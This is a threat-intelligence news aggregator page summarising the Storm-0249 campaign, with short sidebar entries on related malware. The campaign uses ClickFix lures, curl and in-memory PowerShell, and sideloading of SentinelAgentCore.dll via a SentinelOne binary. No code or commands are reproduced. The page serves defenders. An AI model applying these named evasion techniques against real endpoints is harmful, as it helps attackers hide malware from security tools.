Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

Storm-0249 SentinelOne EDR abuse for stealthy malware execution

Malware Activity
First reported
Last updated
Happening score
H score 14
1 unique sources, 1 articles

Summary

Hide ▲

Storm-0249 is abusing SentinelOne EDR components and trusted Windows utilities to load malware, establish C2, and maintain persistence, increasing the risk that the activity will support future ransomware attacks. The operation uses ClickFix social engineering, in-memory PowerShell, and DLL sideloading to blend into normal endpoint activity. The result is stealthier malware execution that is harder for defenders to detect and block.

Related Happenings

Microsoft Defender for Endpoint automatic endpoint isolation preview

Security Tool/Service
First: 26.05.2026 15:19 Last: 26.05.2026 15:19 Sources 1

About this happening: Microsoft is previewing **automatic isolation** for compromised endpoints in **Defender for Endpoint**, reducing **lateral movement** risk on managed workstations. The capability...

Open Happening

Vidar infostealer market rise and distribution expansion

Malware Activity
First: 28.04.2026 22:07 Last: 28.04.2026 22:07 Sources 1

About this happening: **Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...

Open Happening

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

Open Happening

DRILLAPP JavaScript backdoor through Microsoft Edge

Malware Activity
First: 16.03.2026 11:07 Last: 16.03.2026 11:07 Sources 1

About this happening: Observed in **February 2026**, the **DRILLAPP** backdoor now runs through **Microsoft Edge**, giving it **file access** plus access to the **microphone**, **webcam**, and **screen...

Open Happening

BlackSanta EDR killer malware activity targeting HR departments

Malware Activity
First: 11.03.2026 00:57 Last: 11.03.2026 00:57 Sources 1

About this happening: The **BlackSanta** malware operation has run for **more than a year**, targeting **HR departments** and using an **EDR killer** to weaken host defenses before payload execution. T...

Open Happening

Timeline

  1. 09.12.2025 17:24 2 articles · 5mo ago

    Storm-0249 SentinelOne EDR abuse

    Technical Analysis Update

    Storm-0249 abuses SentinelOne EDR components and trusted Microsoft Windows utilities to hide malicious activity, maintain persistence, and funnel encrypted HTTPS command-and-control traffic while preparing ransomware operations. The activity chain uses ClickFix social engineering, malicious curl commands in the Windows Run dialog, a spoofed Microsoft domain delivering PowerShell in memory, and SentinelAgentCore.dll sideloading through SentinelAgentWorker.exe to make the malicious code look like routine endpoint activity.

    Show sources
    Open in new tab